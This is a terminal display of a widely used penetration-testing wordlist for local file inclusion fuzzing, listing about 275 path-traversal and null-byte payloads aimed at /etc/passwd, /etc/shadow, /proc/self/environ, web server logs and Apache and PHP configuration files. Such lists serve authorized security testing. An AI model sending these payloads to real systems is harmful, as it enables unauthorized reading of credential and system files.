[38;5;238m───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[0m
       [38;5;238m│ [0mFile: [1m/usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt[0m
[38;5;238m───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[0m
[38;5;238m   1[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/passwd[0m
[38;5;238m   2[0m   [38;5;238m│[0m [38;2;248;248;242m../logs/access_log[0m
[38;5;238m   3[0m   [38;5;238m│[0m [38;2;248;248;242m../logs/error_log[0m
[38;5;238m   4[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/shadow[0m
[38;5;238m   5[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/group[0m
[38;5;238m   6[0m   [38;5;238m│[0m [38;2;248;248;242mproc/self/environ[0m
[38;5;238m   7[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/environ[0m
[38;5;238m   8[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/cmdline[0m
[38;5;238m   9[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/stat[0m
[38;5;238m  10[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/status[0m
[38;5;238m  11[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/0[0m
[38;5;238m  12[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/1[0m
[38;5;238m  13[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/2[0m
[38;5;238m  14[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/3[0m
[38;5;238m  15[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/4[0m
[38;5;238m  16[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/5[0m
[38;5;238m  17[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/6[0m
[38;5;238m  18[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/7[0m
[38;5;238m  19[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/8[0m
[38;5;238m  20[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/9[0m
[38;5;238m  21[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/10[0m
[38;5;238m  22[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/11[0m
[38;5;238m  23[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/12[0m
[38;5;238m  24[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/13[0m
[38;5;238m  25[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/14[0m
[38;5;238m  26[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/15[0m
[38;5;238m  27[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/16[0m
[38;5;238m  28[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/17[0m
[38;5;238m  29[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/18[0m
[38;5;238m  30[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/19[0m
[38;5;238m  31[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/20[0m
[38;5;238m  32[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/21[0m
[38;5;238m  33[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/22[0m
[38;5;238m  34[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/23[0m
[38;5;238m  35[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/24[0m
[38;5;238m  36[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/25[0m
[38;5;238m  37[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/26[0m
[38;5;238m  38[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/27[0m
[38;5;238m  39[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/28[0m
[38;5;238m  40[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/29[0m
[38;5;238m  41[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/30[0m
[38;5;238m  42[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/31[0m
[38;5;238m  43[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/32[0m
[38;5;238m  44[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/33[0m
[38;5;238m  45[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/34[0m
[38;5;238m  46[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/fd/35[0m
[38;5;238m  47[0m   [38;5;238m│[0m [38;2;248;248;242m/var/cpanel/cpanel.config[0m
[38;5;238m  48[0m   [38;5;238m│[0m [38;2;248;248;242m../etc/passwd[0m
[38;5;238m  49[0m   [38;5;238m│[0m [38;2;248;248;242m../../etc/passwd[0m
[38;5;238m  50[0m   [38;5;238m│[0m [38;2;248;248;242m../../../etc/passwd[0m
[38;5;238m  51[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../etc/passwd[0m
[38;5;238m  52[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../etc/passwd[0m
[38;5;238m  53[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../etc/passwd[0m
[38;5;238m  54[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../etc/passwd[0m
[38;5;238m  55[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../etc/passwd[0m
[38;5;238m  56[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../etc/passwd[0m
[38;5;238m  57[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../etc/passwd[0m
[38;5;238m  58[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../etc/passwd[0m
[38;5;238m  59[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../etc/passwd[0m
[38;5;238m  60[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../etc/passwd[0m
[38;5;238m  61[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../etc/passwd[0m
[38;5;238m  62[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../etc/passwd[0m
[38;5;238m  63[0m   [38;5;238m│[0m [38;2;248;248;242m../proc/self/environ[0m
[38;5;238m  64[0m   [38;5;238m│[0m [38;2;248;248;242m../../proc/self/environ[0m
[38;5;238m  65[0m   [38;5;238m│[0m [38;2;248;248;242m../../../proc/self/environ[0m
[38;5;238m  66[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../proc/self/environ[0m
[38;5;238m  67[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../proc/self/environ[0m
[38;5;238m  68[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../proc/self/environ[0m
[38;5;238m  69[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../proc/self/environ[0m
[38;5;238m  70[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../proc/self/environ[0m
[38;5;238m  71[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../proc/self/environ[0m
[38;5;238m  72[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../proc/self/environ[0m
[38;5;238m  73[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  74[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  75[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  76[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  77[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  78[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  79[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  80[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../../proc/self/environ[0m
[38;5;238m  81[0m   [38;5;238m│[0m [38;2;248;248;242mproc/self/environ%00[0m
[38;5;238m  82[0m   [38;5;238m│[0m [38;2;248;248;242m/proc/self/environ%00[0m
[38;5;238m  83[0m   [38;5;238m│[0m [38;2;248;248;242m../proc/self/environ%00[0m
[38;5;238m  84[0m   [38;5;238m│[0m [38;2;248;248;242m../../proc/self/environ%00[0m
[38;5;238m  85[0m   [38;5;238m│[0m [38;2;248;248;242m../../../proc/self/environ%00[0m
[38;5;238m  86[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../proc/self/environ%00[0m
[38;5;238m  87[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../proc/self/environ%00[0m
[38;5;238m  88[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../proc/self/environ%00[0m
[38;5;238m  89[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../proc/self/environ%00[0m
[38;5;238m  90[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../proc/self/environ%00[0m
[38;5;238m  91[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  92[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  93[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  94[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  95[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  96[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  97[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  98[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m  99[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m 100[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../../proc/self/environ%00[0m
[38;5;238m 101[0m   [38;5;238m│[0m [38;2;248;248;242m../proc/self/fd/8[0m
[38;5;238m 102[0m   [38;5;238m│[0m [38;2;248;248;242m../../proc/self/fd/8[0m
[38;5;238m 103[0m   [38;5;238m│[0m [38;2;248;248;242m../../../proc/self/fd/8[0m
[38;5;238m 104[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../proc/self/fd/8[0m
[38;5;238m 105[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../proc/self/fd/8[0m
[38;5;238m 106[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../proc/self/fd/8[0m
[38;5;238m 107[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../proc/self/fd/8[0m
[38;5;238m 108[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../proc/self/fd/8[0m
[38;5;238m 109[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 110[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 111[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 112[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 113[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 114[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 115[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 116[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 117[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 118[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../../proc/self/fd/8[0m
[38;5;238m 119[0m   [38;5;238m│[0m [38;2;248;248;242m../proc/self/fd/8%00[0m
[38;5;238m 120[0m   [38;5;238m│[0m [38;2;248;248;242m../../proc/self/fd/8%00[0m
[38;5;238m 121[0m   [38;5;238m│[0m [38;2;248;248;242m../../../proc/self/fd/8%00[0m
[38;5;238m 122[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../proc/self/fd/8%00[0m
[38;5;238m 123[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../proc/self/fd/8%00[0m
[38;5;238m 124[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../proc/self/fd/8%00[0m
[38;5;238m 125[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 126[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 127[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 128[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 129[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 130[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 131[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 132[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 133[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 134[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 135[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 136[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../../proc/self/fd/8%00[0m
[38;5;238m 137[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/security/group[0m
[38;5;238m 138[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/security/passwd[0m
[38;5;238m 139[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/security/user[0m
[38;5;238m 140[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/security/environ[0m
[38;5;238m 141[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/security/limits[0m
[38;5;238m 142[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/lib/security/mkuser.default[0m
[38;5;238m 143[0m   [38;5;238m│[0m [38;2;248;248;242m/apache/logs/access.log[0m
[38;5;238m 144[0m   [38;5;238m│[0m [38;2;248;248;242m/apache/logs/error.log[0m
[38;5;238m 145[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/logs/acces_log[0m
[38;5;238m 146[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/logs/error_log[0m
[38;5;238m 147[0m   [38;5;238m│[0m [38;2;248;248;242m/var/www/logs/access_log[0m
[38;5;238m 148[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/logs/access_log[0m
[38;5;238m 149[0m   [38;5;238m│[0m [38;2;248;248;242m../../apache/logs/access.log[0m
[38;5;238m 150[0m   [38;5;238m│[0m [38;2;248;248;242m../../../apache/logs/access.log[0m
[38;5;238m 151[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../apache/logs/access.log[0m
[38;5;238m 152[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache/access_log[0m
[38;5;238m 153[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache2/access_log[0m
[38;5;238m 154[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/access_log[0m
[38;5;238m 155[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/access.log[0m
[38;5;238m 156[0m   [38;5;238m│[0m [38;2;248;248;242m/var/www/logs/error_log[0m
[38;5;238m 157[0m   [38;5;238m│[0m [38;2;248;248;242m/var/www/logs/error.log[0m
[38;5;238m 158[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/logs/error_log[0m
[38;5;238m 159[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/logs/error.log[0m
[38;5;238m 160[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache/error_log[0m
[38;5;238m 161[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache2/error_log[0m
[38;5;238m 162[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache/error.log[0m
[38;5;238m 163[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache2/error.log[0m
[38;5;238m 164[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/error_log[0m
[38;5;238m 165[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/error.log[0m
[38;5;238m 166[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/httpd/access_log[0m
[38;5;238m 167[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/httpd/error_log[0m
[38;5;238m 168[0m   [38;5;238m│[0m [38;2;248;248;242m/apache2/logs/error.log[0m
[38;5;238m 169[0m   [38;5;238m│[0m [38;2;248;248;242m/apache2/logs/access.log[0m
[38;5;238m 170[0m   [38;5;238m│[0m [38;2;248;248;242m/logs/error.log[0m
[38;5;238m 171[0m   [38;5;238m│[0m [38;2;248;248;242m/logs/access.log[0m
[38;5;238m 172[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/logs/acces.log[0m
[38;5;238m 173[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/logs/error.log[0m
[38;5;238m 174[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/logs/access.log[0m
[38;5;238m 175[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache2/logs/access_log[0m
[38;5;238m 176[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache2/logs/access.log[0m
[38;5;238m 177[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache2/logs/error_log[0m
[38;5;238m 178[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache2/logs/error.log[0m
[38;5;238m 179[0m   [38;5;238m│[0m [38;2;248;248;242m/var/www/logs/access.log[0m
[38;5;238m 180[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/httpd/access.log[0m
[38;5;238m 181[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/httpd/error.log[0m
[38;5;238m 182[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache/access.log[0m
[38;5;238m 183[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/apache2/access.log[0m
[38;5;238m 184[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/lampp/logs/access_log[0m
[38;5;238m 185[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/lampp/logs/error_log[0m
[38;5;238m 186[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/xampp/logs/access_log[0m
[38;5;238m 187[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/xampp/logs/error_log[0m
[38;5;238m 188[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/lampp/logs/access.log[0m
[38;5;238m 189[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/lampp/logs/error.log[0m
[38;5;238m 190[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/xampp/logs/access.log[0m
[38;5;238m 191[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/xampp/logs/error.log[0m
[38;5;238m 192[0m   [38;5;238m│[0m [38;2;248;248;242m/Program Files\Apache Group\Apache\logs\access.log[0m
[38;5;238m 193[0m   [38;5;238m│[0m [38;2;248;248;242m/Program Files\Apache Group\Apache\logs\error.log[0m
[38;5;238m 194[0m   [38;5;238m│[0m [38;2;248;248;242m/logs/access_log[0m
[38;5;238m 195[0m   [38;5;238m│[0m [38;2;248;248;242m/logs/error_log[0m
[38;5;238m 196[0m   [38;5;238m│[0m [38;2;248;248;242m../../logs/error_log[0m
[38;5;238m 197[0m   [38;5;238m│[0m [38;2;248;248;242m../../../logs/access_log[0m
[38;5;238m 198[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../logs/error_log[0m
[38;5;238m 199[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../logs/error_log[0m
[38;5;238m 200[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../logs/error_log[0m
[38;5;238m 201[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../logs/error_log[0m
[38;5;238m 202[0m   [38;5;238m│[0m [38;2;248;248;242m../../logs/access_log[0m
[38;5;238m 203[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../logs/access_log[0m
[38;5;238m 204[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../logs/access_log[0m
[38;5;238m 205[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../logs/access_log[0m
[38;5;238m 206[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../logs/access_log[0m
[38;5;238m 207[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/conf/httpd.conf[0m
[38;5;238m 208[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache2/conf/httpd.conf[0m
[38;5;238m 209[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/conf/httpd.conf[0m
[38;5;238m 210[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/apache/conf/httpd.conf[0m
[38;5;238m 211[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/apache/conf/httpd.conf[0m
[38;5;238m 212[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/apache2/httpd.conf[0m
[38;5;238m 213[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/httpd.conf[0m
[38;5;238m 214[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache2/httpd.conf[0m
[38;5;238m 215[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/httpd/conf/httpd.conf[0m
[38;5;238m 216[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/apache2/conf/httpd.conf[0m
[38;5;238m 217[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/httpd/conf/httpd.conf[0m
[38;5;238m 218[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/apache2/conf/httpd.conf[0m
[38;5;238m 219[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/apache/conf/httpd.conf[0m
[38;5;238m 220[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apps/apache2/conf/httpd.conf[0m
[38;5;238m 221[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apps/apache/conf/httpd.conf[0m
[38;5;238m 222[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/apache2/conf/httpd.conf[0m
[38;5;238m 223[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/http/conf/httpd.conf[0m
[38;5;238m 224[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/httpd.conf[0m
[38;5;238m 225[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/http/httpd.conf[0m
[38;5;238m 226[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd.conf[0m
[38;5;238m 227[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/apache/conf/httpd.conf[0m
[38;5;238m 228[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/apache2/conf/httpd.conf[0m
[38;5;238m 229[0m   [38;5;238m│[0m [38;2;248;248;242m/var/www/conf/httpd.conf[0m
[38;5;238m 230[0m   [38;5;238m│[0m [38;2;248;248;242m/private/etc/httpd/httpd.conf[0m
[38;5;238m 231[0m   [38;5;238m│[0m [38;2;248;248;242m/private/etc/httpd/httpd.conf.default[0m
[38;5;238m 232[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/webBackup/opt/apache2/conf/httpd.conf[0m
[38;5;238m 233[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/webBackup/private/etc/httpd/httpd.conf[0m
[38;5;238m 234[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/webBackup/private/etc/httpd/httpd.conf.default[0m
[38;5;238m 235[0m   [38;5;238m│[0m [38;2;248;248;242m/Program Files\Apache Group\Apache\conf\httpd.conf[0m
[38;5;238m 236[0m   [38;5;238m│[0m [38;2;248;248;242m/Program Files\Apache Group\Apache2\conf\httpd.conf[0m
[38;5;238m 237[0m   [38;5;238m│[0m [38;2;248;248;242m/Program Files\xampp\apache\conf\httpd.conf[0m
[38;5;238m 238[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php/httpd.conf.php[0m
[38;5;238m 239[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php4/httpd.conf.php[0m
[38;5;238m 240[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php5/httpd.conf.php[0m
[38;5;238m 241[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php/httpd.conf[0m
[38;5;238m 242[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php4/httpd.conf[0m
[38;5;238m 243[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php5/httpd.conf[0m
[38;5;238m 244[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf[0m
[38;5;238m 245[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf[0m
[38;5;238m 246[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf[0m
[38;5;238m 247[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php[0m
[38;5;238m 248[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php[0m
[38;5;238m 249[0m   [38;5;238m│[0m [38;2;248;248;242m/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php[0m
[38;5;238m 250[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/apache/vhosts.conf[0m
[38;5;238m 251[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php.ini[0m
[38;5;238m 252[0m   [38;5;238m│[0m [38;2;248;248;242m/bin/php.ini[0m
[38;5;238m 253[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/httpd/php.ini[0m
[38;5;238m 254[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/lib/php.ini[0m
[38;5;238m 255[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/lib/php/php.ini[0m
[38;5;238m 256[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/etc/php.ini[0m
[38;5;238m 257[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/lib/php.ini[0m
[38;5;238m 258[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php/lib/php.ini[0m
[38;5;238m 259[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php4/lib/php.ini[0m
[38;5;238m 260[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/php5/lib/php.ini[0m
[38;5;238m 261[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/apache/conf/php.ini[0m
[38;5;238m 262[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php4.4/fcgi/php.ini[0m
[38;5;238m 263[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php4/apache/php.ini[0m
[38;5;238m 264[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php4/apache2/php.ini[0m
[38;5;238m 265[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php5/apache/php.ini[0m
[38;5;238m 266[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php5/apache2/php.ini[0m
[38;5;238m 267[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php/php.ini[0m
[38;5;238m 268[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php/php4/php.ini[0m
[38;5;238m 269[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php/apache/php.ini[0m
[38;5;238m 270[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php/apache2/php.ini[0m
[38;5;238m 271[0m   [38;5;238m│[0m [38;2;248;248;242m/web/conf/php.ini[0m
[38;5;238m 272[0m   [38;5;238m│[0m [38;2;248;248;242m/usr/local/Zend/etc/php.ini[0m
[38;5;238m 273[0m   [38;5;238m│[0m [38;2;248;248;242m/opt/xampp/etc/php.ini[0m
[38;5;238m 274[0m   [38;5;238m│[0m [38;2;248;248;242m/var/local/www/conf/php.ini[0m
[38;5;238m 275[0m   [38;5;238m│[0m [38;2;248;248;242m/etc/php/cgi/php.ini[0m
